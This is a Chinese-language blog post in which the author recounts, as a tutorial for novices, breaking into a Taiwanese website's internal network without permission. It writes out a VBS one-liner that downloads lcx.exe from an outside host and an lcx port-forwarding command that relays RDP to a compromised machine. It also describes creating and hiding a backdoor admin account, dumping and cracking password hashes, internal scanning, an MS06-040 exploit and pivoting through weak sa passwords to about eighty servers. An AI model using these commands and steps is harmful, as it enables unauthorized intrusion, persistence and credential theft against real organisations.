内网渗透对于大型网络入侵非常重要，但我们要懂得一些基本的网络结构，防火墙的设置，如果面的DMZ的配置情况，需要掌握端口转发、信息收集、社会工程学的利用、密码破解等，这是我今天上午拿下一网站内网服务器的经历，没什么技术含量，写出来和菜鸟朋友们分享一下。
  情况的起因：这几天没什么好玩的就去玩玩国外网站，国内的不敢玩了。。。。。。。。。
转去转来盯上一个中国台湾省的一个大站，有二十几个二级域名的分站点，这下好玩了。来点耐心，一个一个的分站去检测一下，一圈下来居然没收获，不是说站点越大入侵的机率越大嘛。于是再挑两个asp的站点看看，在一个不起眼的地方检测了一下搜索型注入，结果在搜索框里没过滤，便构造了一个注入点用nbsi跑起来。
不负众望，居然是一个sa权限的，接下来打算写一个webshell上去，才发现是数据库与web分离的，再看一下开放的端口，80、21、1433、3389都开开的，再看一下ip，是内网的，netstat -an看一下，所有的连接都是另一个内网ip,应该是其它服务器内网连接到这台数据库服务器上的,这只是一个小小的数据库服务器。
  再在本机的cmd下通过网站ip telnet一下上面的端口，不通，看来我是被困死在这台数据库服务器上面了，呆然开了3389是登不上的，相信很多人都遇到这种情况过。
于是我便在nbsi执行命令处下写了一段vbs下载脚本上去：
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://www.ncph.net/lcx.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 >down.vbs
  接着执行cscript down.vbs 还好，下载lcx.exe成功，位置为c:\c.exe
  先来执行个端口转发看看，我知道他们的服务器都放在一个防火墙后面，但虽然外面不能访问里面，里面可以访问外面就好说了。
  继续在nbsi里面执行：c:\c.exe -slave xxx.xxx.xx.xx 51 172.26.1.248 3389
在我的另一台3389肉机监听:c:\lcx.exe -listen 51 4489 ,因为我上网是adsl拔号上网，ip会变的，所以我干脆转发到我的3389肉机上面，一是安全，二是速度快，三是可以让它一直转发到上面。因为我3389肉机的3389端口已开放，所以我就转到4489上面了，然后用3389登录127.0.0.1:4489。
  对了，还忘了建帐号，赶紧刷新nbsi建个隐藏帐号mghk$，这时c.exe 的进程并没有结束，所以转发仍没有断开，用建好的帐号直接进入.

  进去的第一件事当然是隐藏帐号了，以前按照网上的做法总是在用户管理里面看得到mghk$这个用户，玩久了也就知道怎么做最好了，在导出两个注册表后，并不用net user mghk$ /del来删除，以前木木告诉我这样删除，后来我是直接在用户管理里面删除，再导入注册表，再net localgroup administrators mghk$ 加入管理组，这里候我们去用户表里和用户管理里面都看不到，除非管理员用net localgroup administrators才可以看到，不过这几个字母打下来手都痛了，所以没几个管理员这样查看的，以至于我的几台3389肉机用了大半年了还安然无恙，当然是高速极品肉机哦。
第二件事就向他的内网进军，我想到的是立即要做三件事，一是获得管理员密码，如果管理员在线，可以用findpass抓一下，因为这台是windows2000的，也可以用pwdump抓密码哈希再用lc5在本机破解。二是安装嗅探，用cain比较好，因为我们现在上的是3389，三是上传一个扫描软件，内网扫描它网段的内网ip，因为内网扫描我们就已绕过防火墙了,可以得到很多有用信息。
密码没用findpass到，用pwdump抓了个哈希下来用一台肉机开着lc5跑密码，装了个cain，可win2000需要重启，这里就不重启了，以免打草惊蛇。
我传了个hscan上去，自己构造了一下字典，然后扫描172.16.1.1-172.16.1.255网段。还传了个ms06040上去，准备内网溢出。扫描一会得到结果，有不少开139，445的，还空连接成功，更令人兴备的是扫出来一个1433弱口令，还是sa的，当然这些在外网是扫不出来的，因为防火墙屏蔽了所有的外网连接，就只有主站通过80端口连出来的。

我再传了一个sql.exe上去，准备连接mssql用户名和密码为sa的ip,执行命令，还好，它还开了3389，当我们真正进入到内网进行操作的时候才发现比平时从外网入侵容易多了。
直接执行命令

进去后再次登上另一台的3389，这台上面已经有部分网站了，再次抓了这台机器的哈希，发现哈希一至，所以应该他们所有的服务器密码都是一至，只等我挂在肉机上的哈希密码跑出来就ok了，一般三天时间就跑出来，这样就可以宣布彻底搞定这个网站的所有服务器，大至登了一下，有八十几台服务器。